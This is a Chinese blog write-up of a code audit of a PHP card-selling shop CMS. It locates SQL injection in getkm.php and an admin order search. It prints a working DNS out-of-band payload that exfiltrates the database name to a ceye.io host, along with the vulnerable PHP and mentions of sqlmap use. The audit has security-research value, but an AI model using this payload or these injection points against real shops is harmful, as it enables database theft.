php发卡_发卡网代码审计

最新推荐文章于 2021-08-15 00:44:44 发布
最新推荐文章于 2021-08-15 00:44:44 发布
阅读量325 收藏
点赞数
文章标签: php发卡
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36386044/article/details/113708377
版权

前言

好胸弟柠枫昨天dd了我一下,这不,叫我一起审计发卡的cms

479f784f83b80e7bb873407d97154e70.png

君无戏言,最近也在整二进制,当然要跟我的好胸弟一起组队py一下,不知道我都多久没审了,吐

咱语文也不是很好,各位看官就将就着看看就好,水文勿喷

8df8cad0ea906a438017ff3d84666cee.png

0x01.  首页功能点审计

5d881d3c618d7b025840f105acb30029.png

打开一看,发现不是mvc框架了,那就感觉没啥好看头了,对于发卡网这种功能一般情况下是没多少功能点让我getshell的(可能是我太菜,大佬也可以审计一波,交流交流)

ff9bc213923bb95f31d40e20f07f2d44.png

直接进来看一下发现这边没啥可以利用的,莫得慌,我们按照功能点来测,先买一下东西,抓个包,看下是神马

25d2f3ac57835a667f42939c874953fe.png

这边请求到了ajax.php这个页面,好家伙,我们就直接去ajax.php审计一波

76f936fe5c94f42a3fe5ca6ba595667e.png

咦??这这这,这直接拼接的吗,把我给整神了,一看到在where后面,完了

写死了,这没啥子用呀,拼接了也执行不了啥直接把条件写死了,我们继续往下看看

2758ee251c3b1a1fb3b81c2bb53eb4c1.png

本以为这边有爱情,我觉得我又行了,进去_if函数一看哟西,头大了,我丝毫不慌,咱们随缘挖洞,就不信全部都过滤了(好吧,关键地方就是过滤了)

可能我追求速度,没那么认真,然后粗略一看,我们继续看其他地方有没有

3e9a87b9d42f1a83879fe11079965d5a.png

b62160fd28d597048e145d20af9e0f8e.png

最后发现 C:\Users\86183\Desktop\faka\template\chiji\getkm.php 存在注入

也就是 getkm.php 存在注入,我们直接去看看这个页面,我们可以看到它这边是必会执行这下面这条语句,我们就直接在post包中添加 tqm 这个参数就行

template里面是个模板,然后 模板里面都存在 getkm.php,也就是说都存在这个注入

82e5c9b58b56e87814b813a45b2322fb.png

76064cb95b380181c0ad7cca7e7cc402.png

于是扔给了sqlmap跑,但是我发现这边不准确,不知道为什么,我本地搭建的也会延迟,等了好久,没有反应;

95dc8acca95e06bef5edcbfeeb5eab6e.png

b2a03b8fac613fb506810baca0769511.png

那就想想其他骚姿势,没有 mysql_error() 函数,报错注入就算了;

脑瓜子一转,我觉得可以使用 dns带外进行注入,说淦就淦

59f908105c0f0a475725a90bbab93922.png

先去构造一下payload

tqm=1' and (select load_file(concat('\\\\',(select database()),'.pdkzwo.ceye.io\\aaa')))#

4c69c1524b8b0b1c722f9c51f941149d.png

这就成功的执行了~~

转眼看看sqlmap

d9f7dbc0b61e5e53fb3226ffce307c79.png

还是就这样吧......

0x02.  后台功能点

884f28dd2cf6b601d8f3ab05284bcd06.png

然后我们就在这个订单这边审计,看看能审计出什么

<?php $pagesize=30;$pages=intval($numrows/$pagesize);if ($numrows%$pagesize){ $pages++; }if (isset($_GET['page'])){$page=intval($_GET['page']);}else{$page=1;}$offset=$pagesize*($page - 1);if(!empty($_GET['act']) && $_GET['act'] != null && $_GET['act'] == "sousuo"){    $pz = $_POST['pz'];    $sql = "SELECT * FROM if_order WHERE  out_trade_no like '%$pz%' or trade_no like '%$pz%' or rel  like '%$pz%'   order by id desc ";}else{    $sql = "SELECT * FROM if_order WHERE{$sql} order by id desc limit $offset,$pagesize";    // echo $sql;}$rs=$DB->query($sql);while($res = $DB->fetch($rs)){echo ''.$res['out_trade_no'].'
'.$res['trade_no'].''        . ''.getName($res['gid'],$DB).''.$res['rel'].''        . ''.$res['endTime'].''.$res['number'].'¥'.$res['money'].'('.getPayType($res['type']).')'.''.zt($res['sta']).'';}?>

这边出现intval函数,我们就放弃,然后我们继续往下看,看到了这一段

07549ff214600b7c0fce19bbb9746002.png

这.....完全的典型的注入,这边我们可以看到act传参sousuo,POST包传参pz就行了,注入点是在pz的地方

cf9d88d865c00df2fe811d3db5b92e17.png

像我这种脚本小子,都是扔sqlmap一把梭

a3c411fa26431dfe03b74e03047f83fc.png

然后就这样了,这个注入还是比较多的,我没去审计完;

9be6ee00092d4f66ad08bcea45433404.png

本人代码审计一般都是功能点审计,这也是我最常用,实战中也是比较常用的。功能点审计完后可以看看还有没有其他的漏洞,比如添加管理员的时候没有校验cookie等等的逻辑漏洞,然后再敏感函数查找,比如simplexml_load_string,unserilize,命令执行的函数等等

另外:需要源码练手的好胸嘚公众号私聊

申论荟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
YKfaka优卡自动发卡程序漏洞合集(这是篇水文)
课嗨教育的专栏
08-09 2801
alert(/xss/)
窗体测试只能用于本地测试_卡密平台审计到getshell——本地测试
weixin_39856630的博客
11-25 90
本次渗透为本地测试,仅提供学术交流,切勿用于非法用途找了个源码搭建好了后台地址为默认的接下来就是找找源码中一些关键的文件了,发现getkm.php可能存在注入直接代入tqm参数,我们看看包含的common.php文件有没有过滤机制貌似只有个防cc和一个360站卫士,还好,能绕过。POST /getkm.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/...
发卡评估报告
weixin_48421613的博客
09-15 836
发卡平台评估报告 概述 发卡平台是一套基于PHP+MYSQL为核心开发、免费、开源的发卡系统。支持支付宝,财付通,各类点卡等支付方式,适合个人或者企业搭建发卡平台。 发卡平台存在SQL注入、XSS注入、无密码登录、文件上传和文件解析漏洞。 漏洞描述 1.前台卡密购买sql注入,相关文件:./ajax.php及./getkm.php 2.前台卡密购买xss注入,相关文件:./ajax.php 3.失效的访问控制 4.信息泄露 5.文件上传 6.代码注入,相关文件:emailConfig.php SQL注入 前
PHP发卡整合Java支付宝扫码接口(原创)
Java小胡的博客
08-15 517
前言:大家好,我主要使用的是Java开发语言。PHP只是略懂,但上那些开源的基本都是PHP写的,所以我用上开源的PHP发卡对接了我自己用Java写的支付接口,完成整站整合,完美衔接。 ·
发卡(另一版本)的代码审计
https://www.cnblogs.com/zpchcbd/
05-03 641
/other/codepay_notify.php 存在SQL注入 <?php define('SYSTEM_ROOT_E', dirname(__FILE__) . '/'); include '../ayangw/common.php'; // 包含一个文件 ksort($_POST); //排序post参数 reset($_POST); //内部指针指向数组中的第一个元素 $si...
泽宇发卡OR知宇发卡_发卡通杀.rar
04-09
3. 定期进行代码审计和安全扫描,及时发现并修复潜在的安全隐患。 4. 提升服务器的防护能力,如使用防火墙、入侵检测系统等,防止恶意请求的执行。 5. 建立完善的安全更新机制,确保所有使用的框架和库都是最新、最...
2024最新红盟发卡源码开元无加密免费首页模版3套
最新发布
04-27
红盟发卡源码采用现代Web开发技术构建,可能包含但不限于以下技术:PHP作为后端编程语言,MySQL作为数据库管理系统,HTML/CSS/JavaScript等前端技术进行页面展示。开源的特性使得开发者可以深入理解代码逻辑,更...
珊瑚云发卡平台源码压缩包
12-26
该源码可以用于搭建自己的发卡系统,同时,由于它提供了一个实践环境,也适合作为学习和练习【代码审计】的素材。 源码的核心功能可能包括: 1. **用户管理**:用户注册、登录、个人信息管理等功能,确保用户安全...
PHP独角发卡源码.zip
09-08
这涉及到代码审计、数据加密、防火墙配置等多个层面。 7. **统计报表**:生成销售报表,展示销售额、订单量、热门商品等数据,以便于运营分析和决策。 8. **后台管理**:提供给管理员进行日常操作的后台界面,包括...
2021年最新发卡代码 最新彩虹发卡完整运营版+高仿优云宝模板
03-14
代码审计是确保安全的重要步骤,可以检查并消除潜在的shell点(即后门或漏洞),防止恶意攻击。 4. 用户界面:优云宝模板提供了一种高仿的用户界面设计,提升用户体验。这包括清晰的导航、直观的购物流程以及响应式...
【个人发卡系统2.0】轻量级自适应个人免签自助发卡系统+修复版.zip
03-29
源码简介与安装说明: 个人发卡之前好多人反馈下单后返回数据404,查单404 bug 现在已经修复了,可以直接点击复制卡密 轻量级自适应个人自助发卡系统+使用说明 ①:将源码上传至虚拟机或者服务器并解压 ②:访问域名/install安装(填写数据库相关信息) ③:安装完成后登陆后台 默认后台地址 域名/admin 登陆账号: admin 登陆密码: 123456 ④:进入后台修改站相关信息。 (温馨提醒:记得修改登陆路径和账号,以及支付接口) ⑤;访问首页看一下,能否正常支付。 ⑥:添加你的商品和卡密即可售卖 祝您使用愉快 好了 本期文本教程到这里了 ,希望能够帮到你,使用愉快。
超简洁个人发卡源码.zip
06-05
个人发卡源码 超简洁前台样式 自动发卡平台 免授权,无后门,完美运营
搭建个人自动发卡.zip
02-23
搭建个人自动发卡.zip 搭建个人自动发卡.zip 搭建个人自动发卡.zip 搭建个人自动发卡.zip 搭建个人自动发卡.zip 搭建个人自动发卡.zip
个人发卡平台程序源码 v4.0
11-07
个人发卡平台程序源码是一个以PHP+MySQL进行开发的发卡平台源码。1.商品分类,添加分类,添加商品,添加卡密,2.两个支付接口,后台切换3.支持邮箱发送4.后台配置站信息5.一键安装6.界面简洁干净安装说明:上传后访问即可根据提示安装v4.0 更新日志:优化系统邮件发送的BUG(推荐使用163邮箱)若是无法发送邮件请检查自己的服务器或者虚拟主机环境是否安装jmail组件再者检查smtp信息是否正确
商业发卡系统源码.zip
10-12
适合个人商业版发卡平台源码系统无加密无后门适合做辅助的选择推荐大家使用 没什么可介绍的了大家搭建起来就知道了
getkm.php,call.php
weixin_39634884的博客
04-02 157
/*php api.php |awk '{sum+=$1} END {print "Avg= ", sum/NR}'seq 50|xargs -i php /wwwroot/data_site/api.local.com/call.php*/define('APPLICATION_PATH', realpath(__DIR__));$loader=\Yaf\Loader::getInstance(...
php实现距离多少km,php计算距离的代码一例
weixin_31444881的博客
03-28 447
代码如下:/*** 根据经纬度计算距离* by http://www.jbxue.com*/function distance($lat1, $lon1, $lat2, $lon2, $unit) {$theta = $lon1 - $lon2;$dist = sin(deg2rad($lat1)) * sin(deg2rad($lat2)) + cos(deg2rad($lat1)) * co...
2020年php发卡源码,2020年最新PHP自动化售货发卡源码带教程安装
weixin_34382015的博客
03-27 413
GitHub:https://github.com/assimon/dujiaoka安装教程:https://github.com/assimon/dujiaoka/blob/master/wikis/bt_install.md支付接口已集成支付宝当面付支付宝PC支付payjs微信扫码.Paysapi(支付宝/微信).全易支付支持(针对彩虹版)基本环境要求(PHP + PHPCLI) versi...
发卡shell漏洞_个人发卡源码审计【getshell+前台任意重置】【跟随大哥的脚步0x002】...
weixin_39596975的博客
01-17 875
本帖最后由 Adian大蝈蝈 于 2020-8-13 04:07 编辑个人发卡平台美化加强版虽然说是加强版但是我也没见着加强在哪里0x001前台:发卡1.png (106.75 KB, 下载次数: 0)2020-8-13 11:16 上传初略的看了一下前台 qnmd就两个功能是自己的其他都是外接的功能 这谁顶得住阿发卡2.jpg (4.58 KB, 下载次数: 1)2020-8-13 11:1...
写一个发卡小程序前端代码
09-08
### 回答1: 我们可以使用 HTML、CSS 和 JavaScript 来编写前端代码,实现发卡的小程序。下面是一个示例代码: <html> <head> <title>发卡小程序</title> <style> #card-container { width: 300px; height: 200px; padding: 10px; border: 1px solid #ccc; } </style> </head> <body> <div id="card-container"> <h1>发卡小程序</h1> <form> <input type="text" placeholder="请输入卡号" /> <input type="submit" value="发卡" /> </form> </div> <script> const form = document.querySelector('form'); form.addEventListener('submit', (e) => { e.preventDefault(); alert('卡号发送成功!'); }); </script> </body> </html> ### 回答2: 发卡小程序前端代码是用来实现用户发卡操作的界面和交互逻辑的代码。以下是一个简单的发卡小程序前端代码实现: ```html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>发卡小程序</title> <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.min.js"></script> </head> <body> <h1>发卡小程序</h1> <form id="cardForm"> <label for="cardNumber">卡号:</label> <input type="text" id="cardNumber" name="cardNumber" required><br><br> <label for="cardAmount">面额:</label> <input type="text" id="cardAmount" name="cardAmount" required><br><br> <input type="submit" value="发卡"> </form> <div id="result"></div> <script> $(document).ready(function() { $('#cardForm').submit(function(e) { e.preventDefault(); var cardNumber = $('#cardNumber').val(); var cardAmount = $('#cardAmount').val(); // 使用Ajax向后端发送发卡请求 $.ajax({ type: "POST", url: "/api/sendCard", data: { cardNumber: cardNumber, cardAmount: cardAmount }, success: function(response) { // 发卡成功,显示发卡结果 $('#result').text(response.message); }, error: function(xhr, status, error) { // 发卡失败,显示错误信息 $('#result').text("发卡失败,错误信息:" + xhr.responseText); } }); }); }); </script> </body> </html> ``` 以上代码中,使用HTML和JavaScript实现了一个简单的发卡小程序前端界面。用户需要填写卡号和面额,并点击"发卡"按钮提交表单。通过Ajax请求将表单数据发送到后端接口"/api/sendCard",后端根据收到的数据进行处理,并返回发卡结果。最后,前端根据后端返回的结果显示发卡成功或失败的提示信息。 ### 回答3: 发卡小程序的前端代码主要包括页面布局和交互逻辑。以下是一个简单的示例: ```html <!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>发卡小程序</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="app"> <h1>发卡小程序</h1> <form id="card-form"> <label for="card-number">卡号:</label> <input type="text" id="card-number" required> <label for="card-value">面值:</label> <input type="number" id="card-value" required> <button type="submit">发卡</button> </form> <div id="cards-list"> <h2>发卡记录:</h2> <ul id="cards"> <!-- 动态生成发卡记录 --> </ul> </div> </div> <script src="script.js"></script> </body> </html> ``` ```css /* styles.css */ body { font-family: Arial, sans-serif; margin: 0; padding: 20px; } h1 { text-align: center; } form { margin-top: 20px; } form label { display: block; margin-bottom: 5px; } form input { display: block; width: 100%; padding: 5px; margin-bottom: 10px; } button { display: block; width: 100%; padding: 10px; background-color: #337ab7; color: #fff; border: none; cursor: pointer; } button:disabled { background-color: #ccc; cursor: not-allowed; } #cards-list { margin-top: 20px; } #cards-list h2 { margin-bottom: 10px; } ``` ```javascript // script.js document.addEventListener('DOMContentLoaded', function() { const form = document.getElementById('card-form'); const cardNumberInput = document.getElementById('card-number'); const cardValueInput = document.getElementById('card-value'); const cardsList = document.getElementById('cards'); form.addEventListener('submit', function(e) { e.preventDefault(); const cardNumber = cardNumberInput.value; const cardValue = cardValueInput.value; if (cardNumber !== '' && cardValue !== '') { const li = document.createElement('li'); li.textContent = `卡号: ${cardNumber}, 面值: ${cardValue}`; cardsList.appendChild(li); cardNumberInput.value = ''; cardValueInput.value = ''; } }); }); ``` 以上是一个简单的发卡小程序的前端代码。用户可以输入卡号和面值,然后点击发卡按钮,程序将卡号和面值添加到发卡记录中。发卡记录以列表的形式展示在页面上。当用户点击发卡按钮时,会发生表单提交事件,通过JavaScript代码来处理并更新发卡记录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值